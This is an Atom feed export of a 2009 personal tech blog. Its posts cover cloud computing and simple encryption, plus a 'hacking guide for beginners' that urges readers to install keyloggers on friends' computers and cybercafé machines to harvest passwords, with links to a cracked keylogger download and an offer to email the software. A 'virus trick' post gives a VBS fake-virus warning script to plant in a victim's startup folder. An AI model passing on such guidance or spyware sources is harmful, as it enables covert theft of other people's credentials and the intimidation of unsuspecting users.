width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6992490040085192481</id><published>2009-04-15T12:01:00.000-07:00</published><updated>2009-04-16T08:39:53.920-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>HACKING GUIDE FOR BEGINNERS</title><content type='html'>Hacking in layman term can be defined as a way of gaining unauthorized access to a system. Stealing data, passwords ,accessing confidential documents without permission are all different forms of hacking . One of the most common tools used for hacking is KEYLOGGER .A ‘keylogger’ is a software which keeps track of the keystrokes entered by the user and saves it to a text file. The result is that if an user enters his/her password in a system where a keylogger   is installed then the password gets saved in a text file. Thus the profile ,or the Email whose password it was could be easily hacked.The most interesting thing about this software is that it constantly runs in the background without the Windows detecting it .If u press ctrl+alt+del to open the task manager u cant find the program there ,neither can it be found in the Add-Remove programs list .It comes to foreground only on pressing a certain key which is assigned by the person who installed it .For example if a person installs a keylogger on a computer and assign the key F7 to bring it to the foreground no other key except F7 can be used to operate the program .Thus there is no one else except the hacker who has the means of operating the program.&lt;br /&gt;Now lets see this 2 scenarios&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SdJAc5iOEwI/AAAAAAAAAEQ/UnI_lspenMk/s1600-h/IMP.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SdJAc5iOEwI/AAAAAAAAAEQ/UnI_lspenMk/s400/IMP.JPG" alt="" id="BLOGGER_PHOTO_ID_5319384975102841602" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;                    SCREENSHOT OF THE SOFTWARE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. u installed keylogger in ur Pc.A friend comes to ur house any opens his orkut profile .after he goes away u simply press F7 or whatever key u hav assigned for the keylogger to run .then the keylogger menu comes n u can see all the keystrokes entered during ur last session .Now ur frnd must hav typed many things while he was on ur Pc .How to no which among all those is his orkut password SIMPLE just c the text entered after the email id or username, that is his password because in most  cases a person types his email id or username first n then enters the password .Now u can easily log into that profile and HACK it&lt;br /&gt;&lt;br /&gt;2 LETS GO ONE STEP FURTHER : suppose u go to a cybercafé at 10 am in the morning install the keylogger there on a particular machine .Then again go there at 8 Pm in the night sit in the same machine .bring the keylogger menu -&gt; Save the text file containing all the keystrokes and passwords on a pen drive-&gt; n then uninstall the keylogger . AND WHEW U HAV PASSWORDS OF OVER A DOZEN OF PEOPLE!!! ISNT IT GR8!!&lt;br /&gt;&lt;br /&gt;U can even remotely install the keylogger in anyone’s  PC via internet but that obviously requires quite a lot of skill because most ppl hav an antivirus and firewall solution installed in their PC s which can detect keylogger .if u religiously follow my posts I will post the way of overcoming the firewalls in my future blogs .&lt;br /&gt;&lt;br /&gt;Now the million dollar question HOW TO GET THE KEYLOGGER SOFTWARE?&lt;br /&gt;You can google it ,search for torrents, or u can Email me at :  arka_b1990@yahoo.co.in&lt;br /&gt;U will receive the software within 2 days of sending me the email.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;LINKS FOR KEYLOGGER DOWNLOAD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.ziddu.com/download/4324041/007install.exe.html&lt;br /&gt;&lt;br /&gt;ADRAMAX KEYLOGGER&lt;br /&gt;&lt;br /&gt;http://www.ziddu.com/download/4324301/Ardamax.Keylogger.3.0.REAL.REPACK.Cracked-ONY.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I l will uploading more softwares and keyloggers ..so keep a track of this post&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;DISCLAIMER : HACKING IS A CRIMINAL OFFENCE  WHICH CAN LEAD UPTO 7 YEARS OF IMPRISONEMENT IN JAIL.THE AUTHOR OF THE ABOVE BLOG IS IN NO WAY ENCOURAGING HACKING .THE ABOVE BLOG IS JUST TO INCREASE KNOWLEDGE .THE AUTHOR IS IN NO WAY RESPONSIBLE FOR ANY ACT WHICH IS DIRECTLY OR INDIRECTLY INFLUENCED BY THE CONTENTS OF THIS POST &lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6992490040085192481?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6992490040085192481/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/03/hacking-guide-for-beginners.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6992490040085192481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6992490040085192481'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/03/hacking-guide-for-beginners.html' title='HACKING GUIDE FOR BEGINNERS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SdJAc5iOEwI/AAAAAAAAAEQ/UnI_lspenMk/s72-c/IMP.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4174899286365049732</id><published>2009-04-15T02:47:00.001-07:00</published><updated>2009-04-16T07:58:45.326-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>CLOUD COMPUTING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeWtpfRL2qI/AAAAAAAAAG8/UwVmimrdTSU/s1600-h/03cloud_002.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 200px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeWtpfRL2qI/AAAAAAAAAG8/UwVmimrdTSU/s400/03cloud_002.jpg" alt="" id="BLOGGER_PHOTO_ID_5324853062715300514" border="0" /&gt;&lt;/a&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="country-region"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} h3 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:3; 	font-size:13.5pt; 	font-family:"Times New Roman"; 	font-weight:bold;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-size: 14pt;"&gt;CLOUD COMPUTING&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;Cloud computing can be called&lt;span style=""&gt;  &lt;/span&gt;a service, a platform, and even an operating system. Some even link it to such concepts as grid computing -- which is a way of taking many different computers and linking them together to form one very big computer.&lt;/p&gt;  &lt;p&gt;A basic definition of cloud computing is the use of the Internet for the tasks you perform on your computer. The "cloud" represents the Internet.&lt;/p&gt;  &lt;h3&gt;Cloud Computing is a Service&lt;/h3&gt;  &lt;p&gt;The simplest thing that a computer does is allow us to store and retrieve information. We can store our family photographs, our favorite songs, or even save movies on it. This is also the most basic service offered by cloud computing.&lt;/p&gt;  &lt;p&gt;Flicker is a great example of cloud computing as a service. While Flickr started with an emphasis on sharing photos and images, it has emerged as a great place to store those images. In many ways, it is superior to storing the images on your computer.&lt;/p&gt;  &lt;p&gt;First, Flickr allows you to easily access your images no matter where you are or what type of device you are using. While you might upload the photos of your vacation to &lt;st1:country-region st="on"&gt;&lt;st1:place st="on"&gt;Greece&lt;/st1:place&gt;&lt;/st1:country-region&gt; from your home computer, you can easily access them from your laptop while on the road or even from your iPhone while sitting in your local coffee house.&lt;/p&gt;  &lt;p&gt;Second, Flickr lets you share the images. There's no need to burn them to a compact disc or save them on a flash drive. You can just send someone your Flickr address.&lt;/p&gt;  &lt;p&gt;Third, Flickr provides data security. If you keep your photos on your local computer, what happens if your hard drive crashes? You'd better hope you backed them up to a CD or a flash drive! By uploading the images to Flickr, you are providing yourself with data security by creating a backup on the web. And while it is always best to keep a local copy -- either on your computer, a compact disc or a flash drive -- the truth is that you are far more likely to lose the images you store locally than Flickr is of losing your images.&lt;/p&gt;  &lt;p&gt;This is also where grid computing comes into play. Beyond just being used as a place to store and share information, cloud computing can be used to manipulate information. For example, instead of using a local database, businesses could rent CPU time on a web-based database.&lt;/p&gt;  &lt;p&gt;The downside? It is not all clear skies and violin music. The major drawback to using cloud computing as a service is that it requires an Internet connection. So, while there are many benefits, you'll lose them off if you are cut off from the Web.&lt;/p&gt;  &lt;h3&gt;Cloud Computing is a Platform&lt;/h3&gt;  &lt;p&gt;&lt;i&gt;The web is the operating system of the future.&lt;/i&gt; While not exactly true -- we'll always need a local operating system -- this popular saying really means that the web is the next great platform. &lt;/p&gt;  &lt;p&gt;What's a platform? It is the basic structure on which applications stand. In other words, it is what runs our apps. Windows is a platform. The Mac OS is a platform. But a platform doesn't have to be an operating system. Java is a platform even though it is not an operating system. &lt;/p&gt;  &lt;p&gt;Through cloud computing, the web is becoming a platform. With trends such as Office 2.0, we are seeing more and more applications that were once the province of desktop computers being converted into web applications. Word processors like Buzzword and office suites like Google Docs are slowly becoming as functional as their desktop counterparts and could easily replace software such as Microsoft Office in many homes or small offices.&lt;/p&gt;  &lt;p&gt;But cloud computing transcends Office 2.0 to deliver applications of all shapes and sizes from web mashups to Facebook applications to web-based massively multiplayer online role-playing games. With new technologies that help web applications store some information locally -- which allows an online word processor to be used offline as well -- and a new browser called Chrome to push the envelope, Google is a major player in turning cloud computing into a platform.&lt;/p&gt;  &lt;h3&gt;Cloud Computing and Interoperability&lt;/h3&gt;  &lt;p&gt;A major barrier to cloud computing is the interoperability of applications. While it is possible to insert an Adobe Acrobat file into a Microsoft Word document, things get a little bit stickier when we talk about web-based applications. &lt;/p&gt;  &lt;p&gt;This is where some of the most attractive elements to cloud computing -- storing the information on the web and allowing the web to do most of the 'computing' -- becomes a barrier to getting things done. While we might one day be able to insert our Google Docs word processor document into our Google Docs spreadsheet, things are a little stickier when it comes to inserting a Buzzword document into our Google Docs spreadsheet. &lt;/p&gt;  &lt;p&gt;Ignoring for a moment that Google probably doesn't want you to have the ability to insert a competitor's document into their spreadsheet, this creates a ton of data security issues. So not only would we need a standard for web 'documents' to become web 'objects' capable of being generically inserted into any other web document, we'll also need a system to maintain a certain level of security when it comes to this type of data sharing.&lt;/p&gt;  &lt;p&gt;Possible? Certainly, but it isn't anything that will happen overnight.&lt;/p&gt;  &lt;h3&gt;What is Cloud Computing?&lt;/h3&gt;  &lt;p&gt;This brings us back to the initial question. What is cloud computing? It is the process of taking the services and tasks performed by our computers and bringing them to the web. &lt;/p&gt;  &lt;p&gt;What does this mean to us?&lt;/p&gt;  &lt;p&gt;With the "cloud" doing most of the work, this frees us up to access the "cloud" however we choose. It could be a super-charged desktop PC designed for high-end gaming, or a "thin client" laptop running the Linux operating system with an 8 gig flash drive instead of a conventional hard drive, or even an iPhone or a Blackberry.&lt;/p&gt;  &lt;p&gt;We can also get at the same information and perform the same tasks whether we are at work, at home, or even a friend's house. Not that you would want to take a break between rounds of Texas Hold'em to do some work for the office -- but the prospect of being &lt;i&gt;able&lt;/i&gt; to do it is pretty cool. &lt;/p&gt;  &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;To know more about Cloud computing check out this post by my college senior Abhik Mitra (MICROSOFT STUDENT PARTNER)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;a href="http://abhiktechie.blogspot.com/2009/02/cloud-computinga-basic-idea.html"&gt;http://abhiktechie.blogspot.com/2009/02/cloud-computinga-basic-idea.html&lt;/a&gt;.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt; &lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4174899286365049732?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4174899286365049732/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/normal-0-false-false-false.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4174899286365049732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4174899286365049732'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/normal-0-false-false-false.html' title='CLOUD COMPUTING'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SeWtpfRL2qI/AAAAAAAAAG8/UwVmimrdTSU/s72-c/03cloud_002.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2549853136708368066</id><published>2009-04-14T06:09:00.001-07:00</published><updated>2009-04-14T08:10:02.502-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>VIRUS TRICK</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SeSnJ787pNI/AAAAAAAAAG0/bJr6wY2kGZ4/s1600-h/4-14-2009+8-38-27+PM.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 78px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SeSnJ787pNI/AAAAAAAAAG0/bJr6wY2kGZ4/s400/4-14-2009+8-38-27+PM.jpg" alt="" id="BLOGGER_PHOTO_ID_5324564448612689106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;Open notepad and type this:&lt;br /&gt;&lt;br /&gt;lol=msgbox ("Warning a fatal virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")&lt;br /&gt;&lt;br /&gt;Then save it as anything.VBS&lt;br /&gt;&lt;br /&gt;and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.&lt;br /&gt;On startup the window should appear.&lt;br /&gt;Note: This does not harm your computer as it does not contain virus.&lt;br /&gt;&lt;br /&gt;The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning")&lt;br /&gt;&lt;br /&gt;Oh in between make sure your victim does not panic and really reformat his harddisk. hahaha :)&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2549853136708368066?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2549853136708368066/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/virus-trick.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2549853136708368066'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2549853136708368066'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/virus-trick.html' title='VIRUS TRICK'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SeSnJ787pNI/AAAAAAAAAG0/bJr6wY2kGZ4/s72-c/4-14-2009+8-38-27+PM.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-2008948408884344747</id><published>2009-04-13T05:59:00.000-07:00</published><updated>2009-04-13T06:49:01.433-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>ENCRYPTION</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SeNCwhah9kI/AAAAAAAAAGs/kRDoj2DZRJw/s1600-h/uconomix-encryption-engine.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 302px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SeNCwhah9kI/AAAAAAAAAGs/kRDoj2DZRJw/s400/uconomix-encryption-engine.jpg" alt="" id="BLOGGER_PHOTO_ID_5324172585852859970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key. The result of the process is encrypted information (in cryptography, referred to as cipher text). In many contexts, the word encryption also implicitly refers to the reverse process, decryption (e.g. “software for encryption” can typically also perform decryption), to make the encrypted information readable again (i.e. to make it unencrypted).&lt;br /&gt;Encryption is also used to protect data in transit, for example data being transferred via networks (e.g. the Internet, e-commerce), mobile telephones, wireless microphones, wireless intercom systems, Bluetooth devices and bank automatic teller machines. There have also been numerous reports of data in transit being intercepted in recent years [2]. Encrypting data in transit also helps to secure it as it is often difficult to physically secure all access to networks. Encryption, by itself, can protect the confidentiality of messages, but other techniques are still needed to protect the integrity and authenticity of a message; for example, verification of a message authentication code (MAC) or a digital signature. Standards and cryptographic software and hardware to perform encryption are widely available, but successfully using encryption to ensure security may be a challenging problem. A single slip-up in system design or execution can allow successful attacks. Sometimes an adversary can obtain unencrypted information without directly undoing the encryption. See, e.g., traffic analysis, TEMPEST, or Trojan horse.&lt;br /&gt;.&lt;br /&gt;Lets c the following scenario.:&lt;br /&gt;There is a software which encrypts information in the following way .It adds 3 to each alphabet before sending it  and at the receiving end there is a software which subtracts 3 and again decrypts it for the receiver.&lt;br /&gt;Suppose A is the sender n B is the receiver .&lt;br /&gt;A sends the messege “ABC”.. after passing through encryptor it becomes ”DEF”. if the data is now leaked then the person receiving the leaked data will get “DEF” instead of “ABC”..now we no that 3 has been added to each alphabet the person receiving it doesn’t no what has been added so it is tough to get the original messege.Now when the data reaches the receiver end the decrypting software subtracts 3 and the original text is revived&lt;br /&gt;&lt;br /&gt;THIS WAS A VERY SIMPLE EXAMPLE .REAL WORLD ENCRYPTION PROCESS ARE MUCH MORE COMPLICATED AND COMPLEX THUS THE SKILL REQUIRED BY HACKERS IN DEFEATING THEM IS ALSO VERY HIGH&lt;br /&gt;Some of the encryption algoritms&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;RSA&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;DES/3DES&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;BLOWFISH&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;IDEA&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;SEAL&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;RC4&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;font-size:78%;" &gt;IF  U  WANT  TO  NO  MORE  ABOUT  JUST  GOOGLE  THEM&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2008948408884344747?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2008948408884344747/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/encryption.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2008948408884344747'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2008948408884344747'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/encryption.html' title='ENCRYPTION'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SeNCwhah9kI/AAAAAAAAAGs/kRDoj2DZRJw/s72-c/uconomix-encryption-engine.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7724391482205285754</id><published>2009-04-12T04:02:00.000-07:00</published><updated>2009-05-22T10:40:02.562-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>DISGUISE FOLDERS AS RECYCLE BIN</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeHLKlnOH4I/AAAAAAAAAGc/LvQzkix6ZIY/s1600-h/recyclebin.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 326px; height: 349px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeHLKlnOH4I/AAAAAAAAAGc/LvQzkix6ZIY/s400/recyclebin.png" alt="" id="BLOGGER_PHOTO_ID_5323759617284382594" border="0" 